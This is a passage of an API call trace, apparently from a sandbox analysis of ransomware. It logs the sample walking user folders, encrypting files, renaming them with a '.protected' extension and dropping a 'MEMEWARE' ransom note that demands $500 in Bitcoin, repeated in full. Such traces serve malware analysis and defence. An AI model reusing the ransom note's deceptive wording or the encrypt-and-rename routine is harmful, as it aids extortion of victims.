lpOverlapped=0x0) returned 1 [0089.330] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.330] CloseHandle (hObject=0x150) returned 1 [0089.330] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.protected") returned 79 [0089.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.protected")) returned 1 [0089.331] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.331] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\RESTORE_FILES.txt") returned 80 [0089.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.332] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.332] lstrlenA (lpString="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") returned 684 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.332] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.333] CloseHandle (hObject=0x14c) returned 1 [0089.333] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Windows") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Program Files") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Program Files (x86)") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="$Recycle.bin") returned 1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="System Volume Information") returned -1 [0089.333] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned 70 [0089.334] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0089.334] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0089.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*") returned 72 [0089.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.334] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.") returned 72 [0089.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.334] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\..") returned 73 [0089.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.335] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Windows") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Program Files") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Program Files (x86)") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="$Recycle.bin") returned 1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="System Volume Information") returned -1 [0089.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrIW (lpFirst="deployment.properties", lpSrch=".protected") returned 0x0 [0089.335] lstrcmpW (lpString1="deployment.properties", lpString2="RESTORE_FILES.txt") returned -1 [0089.335] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.335] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrW (lpFirst="deployment.properties", lpSrch=".txt") returned 0x0 [0089.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrW (lpFirst="deployment.properties", lpSrch=".rar") returned 0x0 [0089.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.336] StrStrW (lpFirst="deployment.properties", lpSrch=".zip") returned 0x0 [0089.336] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2cf, lpOverlapped=0x0) returned 1 [0089.346] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd31, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2cf, lpOverlapped=0x0) returned 1 [0089.346] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.347] CloseHandle (hObject=0x150) returned 1 [0089.347] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.protected") returned 102 [0089.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.protected")) returned 1 [0089.348] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Windows") returned -1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Program 
Files") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Program Files (x86)") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="$Recycle.bin") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="System Volume Information") returned -1 [0089.348] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned 79 [0089.348] lstrcmpW (lpString1="security", lpString2=".") returned 1 [0089.348] lstrcmpW (lpString1="security", lpString2="..") returned 1 [0089.348] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*") returned 81 [0089.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.348] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.") returned 81 [0089.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.349] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.349] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0089.349] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.349] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\..") returned 82 [0089.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.349] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.349] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\RESTORE_FILES.txt") returned 97 [0089.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.350] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.350] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.351] lstrlenA (lpString="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") returned 684 [0089.351] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.351] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.351] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.351] CloseHandle (hObject=0x150) returned 1 [0089.351] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Windows") returned -1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Program Files") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Program Files (x86)") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="$Recycle.bin") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="System Volume Information") returned 1 [0089.351] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned 74 [0089.351] lstrcmpW (lpString1="tmp", lpString2=".") returned 1 [0089.351] lstrcmpW (lpString1="tmp", lpString2="..") returned 1 [0089.351] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*") returned 76 [0089.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.351] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.") returned 76 [0089.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.352] FindNextFileW (in: 
hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\..") returned 77 [0089.352] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.352] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Program Files") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Program Files (x86)") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned 77 [0089.352] lstrcmpW (lpString1="si", lpString2=".") returned 1 [0089.352] lstrcmpW (lpString1="si", lpString2="..") returned 1 [0089.352] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*") returned 79 [0089.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", 
lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.352] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.") returned 79 [0089.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.353] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\..") returned 80 [0089.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.353] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\RESTORE_FILES.txt") returned 95 [0089.353] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.354] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.354] lstrlenA (lpString="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") returned 684 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.354] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.354] CloseHandle (hObject=0x154) returned 1 [0089.354] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.354] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.355] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RESTORE_FILES.txt") returned 92 [0089.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 